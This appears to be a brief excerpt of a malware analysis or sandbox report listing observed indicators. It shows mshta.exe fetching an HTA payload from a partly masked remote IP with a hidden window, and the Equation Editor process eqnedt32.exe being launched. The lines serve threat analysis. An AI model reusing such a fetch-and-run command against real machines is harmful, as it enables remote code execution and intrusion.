Technical Information
- '%WINDIR%\syswow64\mshta.exe' http://46.###.220.29:1010/hta &AAAAAAAC
- '46.##3.220.29':1010
- '%WINDIR%\syswow64\mshta.exe' http://46.###.220.29:1010/hta &AAAAAAAC' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding